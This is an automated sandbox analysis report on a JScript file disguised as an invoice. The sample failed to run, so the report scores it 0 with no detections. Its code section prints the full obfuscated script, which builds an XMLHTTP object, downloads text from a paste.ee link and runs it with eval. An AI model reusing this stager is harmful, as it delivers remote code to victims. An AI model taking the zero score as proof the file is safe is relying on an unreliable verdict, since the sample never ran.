Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Factura N__ 202511300-5174

Overview

General Information

Sample name:Factura N__ 202511300-5174
Analysis ID:1676006
MD5:f3a9f825910b8bce004b0ba13d840c97
SHA1:4883573937e07371b1d9242100ce56bc2414effa
SHA256:3f5c583c3a317d63b43211cf3ac04b5dec84d0def7820989b866e02f5126c532
Errors
  • No process behavior to analyse as no analysis process or sample was found
  • Corrupt sample or wrongly selected analyzer. Details: invalid parameter

Detection

Score:0
Range:0 - 100
Confidence:100%

Signatures

No high impact signatures.

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: classification engineClassification label: unknown0.win@0/0@0/0

Mitre Att&ck Matrix

No Mitre Att&ck techniques found

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1676006
Start date and time:2025-04-28 09:02:21 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:0
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Factura N__ 202511300-5174
Detection:UNKNOWN
Classification:unknown0.win@0/0@0/0
Cookbook Comments:
  • Unable to launch sample, stop analysis
  • No process behavior to analyse as no analysis process or sample was found
  • Corrupt sample or wrongly selected analyzer. Details: invalid parameter

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:Unicode text, UTF-8 text, with very long lines (486), with CRLF line terminators
Entropy (8bit):5.442426324948063
TrID:
    File name:Factura N__ 202511300-5174
    File size:1'672 bytes
    MD5:f3a9f825910b8bce004b0ba13d840c97
    SHA1:4883573937e07371b1d9242100ce56bc2414effa
    SHA256:3f5c583c3a317d63b43211cf3ac04b5dec84d0def7820989b866e02f5126c532
    SHA512:8b20e8b245383a13d68b8a4c0e7b35dc9af102660477554199a4fc04bcde96d65210f0196c9329a1d6ded8f46dac4da67770998205b5d97f579bf905b13b2990
    SSDEEP:48:O9IGv84VPnn7mR667Amns1Hss6367Q8pBqRaW7D:O9D4
    TLSH:2E31D867C8C73566A47A2C8E644AD6A013F480D77A37488D2C3BC3F60D67A7618517BD
    File Content Preview:var spitfires = "MSX..............................................ML2...............................................XML..............................................HTTP";..var pneumatomachy = new ActiveXObject(spitfires.split("...........................

    File Icon

    Icon Hash:72e2a2a292a2a2b2

    Network Behavior

    No network behavior found

    Statistics

    No statistics

    System Behavior

    No system behavior

    Disassembly

    Code Analysis

    Call Graph

    Hide Legend
    • Executed
    • Not Executed
    callgraph clusterC0 clusterC2C0 clusterC8C2 clusterC12C2 clusterC4C0 clusterC6C0 clusterC10C0 clusterC14C0 E1C0 entry:C0 F9C8 open E1C0->F9C8 F13C12 send E1C0->F13C12 F5C4 join E1C0->F5C4 F7C6 split E1C0->F7C6 F11C10 replace E1C0->F11C10 F15C14 eval E1C0->F15C14 F3C2 ActiveXObject()

    Script:

    Code
    0
    var spitfires = "MSX\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9ML2\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9.XML\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9HTTP";
      1
      var pneumatomachy = new ActiveXObject ( spitfires.split ( "\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9" ).join ( "" ) );
        2
        pneumatomachy.open ( "GET", "h\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9s\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9:\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9a\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9s\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9t\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9.\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9e\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9d\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9p\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9z\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9B\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9J\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9m\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9O\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9C\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9M".replace ( /\x0a97\x2245\x2cb9\xca\xd83e\xddfe\x231a\xd83d\xdd00\x10a4\x278e\x0ce9\x2d4b\x0c04\x13c8\x09d0\x09d9/g, "" ), false );
          3
          pneumatomachy.send ( );
            4
            eval ( pneumatomachy.responseText );